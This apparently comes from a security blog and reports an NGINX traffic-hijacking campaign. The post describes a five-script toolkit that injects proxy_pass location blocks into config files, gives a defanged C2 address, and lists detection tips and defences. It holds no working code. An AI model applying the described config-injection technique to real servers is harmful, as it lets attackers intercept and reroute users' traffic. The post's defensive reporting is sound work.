NGINX Hijacked: How Attackers Are Redirecting User Traffic Undetected

February 5, 2026 Faeem BLOGS 0

A new campaign targeting NGINX servers is quietly rerouting user traffic through attacker-controlled infrastructure—without triggering alarms. Discovered by DataDog Security Labs, this operation exploits configuration files, not vulnerabilities, making it stealthy and dangerous.

The threat actor isn’t breaking into NGINX—they’re rewriting its rules.

What’s Happening

NGINX is widely used for web serving, load balancing, and reverse proxying. In this campaign, attackers:

  • Inject malicious ‘location’ blocks into NGINX config files.
  • Use the proxy_pass directive to forward traffic to attacker domains.
  • Preserve headers like Host, User-Agent, and Referer to make traffic look legitimate.

The 5-Stage Toolkit

The attack uses a scripted toolkit with five stages:

  1. zx.sh – Downloads and executes remaining scripts; uses raw TCP fallback.
  2. bt.sh – Targets Baota-managed NGINX configs; injects templates based on server_name.
  3. 4zdh.sh – Scans common config paths; uses awk, csplit, and hashing to avoid corruption.
  4. zdh.sh – Focuses on /etc/nginx/sites-enabled; targets .in, .id domains.
  5. ok.sh – Maps hijacked domains and proxy targets; exfiltrates data to C2 server 158.94.210[.]227.

Why It’s Hard to Detect

  • No exploit used: attackers abuse legitimate config directives.
  • Traffic still reaches destination: users don’t notice rerouting.
  • Headers preserved: makes traffic appear normal.
  • No service downtime: NGINX reloads cleanly after injection.

Unless defenders monitor config files or outbound proxy traffic, this attack flies under the radar.

What You Can Do

Detection Tips

  • Monitor for unexpected changes in NGINX config files.
  • Alert on external proxy_pass directives to unknown domains.
  • Flag unusual traffic patterns from .edu, .gov, .in, .id, .pe, .bd, .th domains.
  • Watch for scripted config reloads and forced restarts (pkill nginx).

Defense Recommendations

  • Implement file integrity monitoring on NGINX directories.
  • Restrict access to config files and enforce change control.
  • Use behavioral analytics to detect proxy abuse.
  • Regularly audit proxy_pass rules and backend targets.

Final Thoughts

This campaign shows how attackers are evolving—not by exploiting vulnerabilities, but by hijacking configurations. NGINX admins must treat config files as critical assets and monitor them like code.

Be the first to comment

Leave a Reply

Your email address will not be published.


*


This site uses Akismet to reduce spam. Learn how your comment data is processed.